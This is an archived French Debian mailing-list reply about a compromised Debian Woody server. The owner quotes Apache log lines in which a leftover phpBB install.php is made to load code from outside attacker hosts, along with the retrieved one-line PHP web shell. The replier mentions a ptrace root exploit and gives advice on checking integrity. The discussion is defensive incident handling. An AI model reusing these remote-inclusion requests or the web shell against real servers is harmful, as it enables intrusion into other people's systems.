Re: Hack sur GNU/Debian Woody !
Le Mon, 04 Aug 2003 02:12:53 +0200, Freedom66 <webmaster@freedom66.org> a barbouillé:
> Bon je crois que j'ai trouvé le problème, au moins j'aurais publié le
> code qu'il ne fallait surtout pas publier :)
> Dans d'autres logs d'apache que j'avais oublié j'ai retrouvé :
> 200.103.138.205 - - [29/Jul/2003:00:53:38 +0200] "GET
> /phpBB2/install.php?phpbb_root_dir=http://www.superwroger.hpg.ig.com.br
> / HTTP/1.1" 200 930 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98;
> Win 9x 4.90)"
> 200.103.138.205 - - [29/Jul/2003:00:53:38 +0200] "GET
> /phpBB2/install.php?phpbb_root_dir=http://www.superwroger.hpg.ig.com.br
> / HTTP/1.1" 200 359 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98;
> Win 9x 4.90)"
> (...)
> 200.103.138.205 - - [29/Jul/2003:00:58:52 +0200] "GET
> /phpBB2/install.php?phpbb_root_dir=http://www.myxpls.hpg.ig.com.br/ HTT
> P/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x
> 4.90)"
>
> Donc une erreur de ma part en laissant le script d'installation de phpBB
> dans un répertoire, mea culpa... :-(
> En récupérant la page
> http://www.superwroger.hpg.ig.com.br/includes/functions_selects.php,
> voici ce qu'elle contient :
>
> <pre>
> <?php
> system($command);
> ?>
>
> Donc cela exécute une commande (certes je ne vois pas laquelle, mais peu
> importe), quoiqu'il en soit l'heure et la date corroborent l'heure à
> laquelle le code source (logs) a été compilé... Si je ne me trompe en
> faisant cela, le 'hacker' n'a eu accès qu'aux droits d'apache qui sont
je pense plus a un script kiddy qu'a un pirate ;) et un hacker( http://www.linux-france.org/prj/jargonf/H/hacker.html ) n'est pas forcement un pirate.
> très limité ? Donc il n'a pas su faire plus de dégats ou je me trompe ?
Il a pu lancer l'exploit ptrace pour les kernels < 2.4.20 (http://www.securiteam.com/unixfocus/5FP0A2K9GQ.html) et avoir un shell root sur ta machine :) ce n'est pas pour te faire peur mais ce qui a pu arriver. Vu que tu avais gardé le kernel de base (2.4.18).
> Quoiqu'il en soit je vais devoir m'amuser à vérifier l'intégrité de mon
> système tout entier... Si quelqu'un a une autre méthode que s'amuser à
> faire les md5sum des exécutables importants sur mon serveur et puis sur
> une autre debian, cela m'intéresserait... Et aussi comment vérifies-t-on
> l'intégrité des fichiers wtmp/utmp/lastlog/messages et autres ? Aussi,
Pour tes fichiers de logs tu peux vérifier que certaines partis ne sont pas remplis de bits nuls (\0) par endroits, méthode utilisé par certains log cleaner.
> peut-on se fier au résultat de chkrootkit (0.35) ?
Pour les backdoors oui :) cet outil a été fait pour ca.
> Merci à list(AT)zaide.org pour son aide qui m'a mis sur la voie.
De rien
> Juste une dernière petite question, est-ce que cela sert à quelque chose
> d'essayer d'informer quelqu'un de ce 'méfait' ? l'I.S.P. ? LACNIC à qui
> appartient l'ip ?
Ca c'est a toi de voir :) tu pourais aussi contacter le groupe dont tu as trouvé le code source :)
> Merci d'avance.
> Freedom66
>
>
> --
> Pensez à lire la FAQ de la liste avant de poser une question :
> http://savannah.nongnu.org/download/debfr-faq/html/
>
> To UNSUBSCRIBE, email to debian-user-french-request@lists.debian.org
> with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org
>
Reply to: